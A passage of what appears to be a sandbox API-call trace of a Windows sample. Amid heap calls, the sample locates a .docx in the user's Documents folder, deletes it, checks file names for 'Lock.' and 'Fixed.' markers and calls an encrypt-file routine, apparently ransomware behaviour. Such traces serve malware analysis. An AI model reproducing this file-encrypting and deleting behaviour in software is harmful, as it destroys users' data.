hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0259.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.894] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0259.895] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0259.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0259.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0259.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0259.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e558d8 [0259.897] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/BDml_a2hzV.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\BDml_a2hzV.docx", lpFilePart=0x8cedf4*="BDml_a2hzV.docx") returned 0x29 [0259.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.897] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\BDml_a2hzV.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bdml_a2hzv.docx")) returned 0x20 [0259.897] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\BDml_a2hzV.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23faadc0, ftCreationTime.dwHighDateTime=0x1d5eb5b, ftLastAccessTime.dwLowDateTime=0x22475c70, ftLastAccessTime.dwHighDateTime=0x1d5cde3, ftLastWriteTime.dwLowDateTime=0x22475c70, ftLastWriteTime.dwHighDateTime=0x1d5cde3, nFileSizeHigh=0x0, nFileSizeLow=0xa512, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BDml_a2hzV.docx", cAlternateFileName="BDML_A~1.DOC")) returned 0xa872d0 [0259.897] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\BDml_a2hzV.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bdml_a2hzv.docx")) returned 1 [0259.898] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23faadc0, ftCreationTime.dwHighDateTime=0x1d5eb5b, ftLastAccessTime.dwLowDateTime=0x22475c70, ftLastAccessTime.dwHighDateTime=0x1d5cde3, ftLastWriteTime.dwLowDateTime=0x22475c70, ftLastWriteTime.dwHighDateTime=0x1d5cde3, nFileSizeHigh=0x0, nFileSizeLow=0xa512, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BDml_a2hzV.docx", cAlternateFileName="BDML_A~1.DOC")) returned 0 [0259.898] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0259.899] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0259.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0259.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e558d8 [0259.900] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/BDml_a2hzV.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\BDml_a2hzV.docx", lpFilePart=0x8cf650*="BDml_a2hzV.docx") returned 0x29 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.900] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\BDml_a2hzV.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bdml_a2hzv.docx")) returned 0xffffffff [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0259.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0259.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0259.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0259.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BGmPJ_.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GmPJ_.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mPJ_.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PJ_.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J_.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.904] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0259.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BGmPJ_.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GmPJ_.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mPJ_.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PJ_.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J_.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.904] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0259.904] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0259.904] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.905] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0259.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.906] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/BGmPJ_.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e4e750, ftCreationTime.dwHighDateTime=0x1d58142, ftLastAccessTime.dwLowDateTime=0x1ad4e820, ftLastAccessTime.dwHighDateTime=0x1d5743f, 